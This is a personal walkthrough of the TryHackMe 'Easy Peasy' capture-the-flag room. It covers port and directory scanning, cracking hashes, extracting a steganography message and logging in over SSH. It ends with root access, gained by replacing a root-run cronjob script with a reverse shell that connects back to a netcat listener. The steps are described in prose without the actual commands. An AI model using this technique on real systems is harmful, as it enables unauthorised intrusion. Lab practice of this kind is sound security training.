EasyPeasy
Practice using tools such as Nmap and GoBuster to locate a hidden directory to get initial access to a vulnerable machine. Then escalate your privileges through a vulnerable cronjob.
Last updated
Practice using tools such as Nmap and GoBuster to locate a hidden directory to get initial access to a vulnerable machine. Then escalate your privileges through a vulnerable cronjob.
Last updated
Try this challenge in TryHackMe: Easy Peasy
I tried this easy CTF and below is my thought process on how I answered the questions and some notes for future reference. I got some hints from this Medium walkthrough: TryHackMe: Easy Peasy Write-up by Kevin De Vijlder
Let's run a nmap scan to check the open ports on the IP assigned to us. Just replace the 10.10.X.X to the IP given to you.
-sT (TCP connect scan)
To answer the next two questions, we’ll be running a nmap scan for the open ports:
Run gobuster for http://10.10.X.X/
We found out that there is a /hidden directory. Let's try to run gobuster for http://10.10.X.X/hidden
Go to http://10.10.X.X/hidden/whatever
Copy the hidden hash
To decrypt the hash, go to an online decrypter like https://hashes.com/en/decrypt/hash for faster results
Run gobuster for http://10.10.X.X:65524
Check 10.10.X.X:65524/robots.txt
In the User-Agent field, there’s a hash
To find the type of the hash, use hash-identifier module
Decrypt hash using an online MD5 decrypter
From our nmap scan, go to http://10.10.X.X:65524
Flag 3 is written in plain sight on the web page
When you View the Page Source of http://10.10.X.X:65524, a hidden field will be seen that has a hash.
We’ll use CyberChef to decrypt hash from Base6X (explore options available in CyberChef)
When you go to the hidden directory, you’ll see a picture
Save the image with its default name
We’ll use steganography to decode the message in the image
But a passphrase is needed to decrypt this file
Let’s try to View the Page Source of the image page to get some clues. We indeed retrieved a hash.
Save the hash using the filename hash.txt
To decrypt the hash, use the johntheripper module
Going back to the steghide module, enter the passphrase that we got.
A file secrettext.txt was extracted. Use this to view the contents of the file.
We’ll get a username boring and binary numbers that need to be decrypted
Use a Binary to Text converter tool online like this:
https://www.rapidtables.com/convert/number/binary-to-ascii.html
From our previous nmap scan, we’ll use the port 6498 for the ssh access
From the Hint, we got the term “Rotated”, which suggests that this may be encrypted with ROT13. Using CyberChef, we decrypt the flag.
From the description of this room, we are expected to escalate our privileges through a vulnerable cronjob
The cron job is located in /var/www
We’ll see the cronjob mysecretcronjob.sh that said that will run as root.
We can set up a netcat listener in our machine to have a reverse shell since the cronjob has root privileges.
Let's craft our payload:
Get the reverse shell script from pentestmonkey's reverse shell cheat sheet then replace the contents of mysecretcronjob.sh
*use your machine IP & port 5556
Let's now wait for the cronjob to be executed to receive a shell
We can see the flag in the .root.txt file.
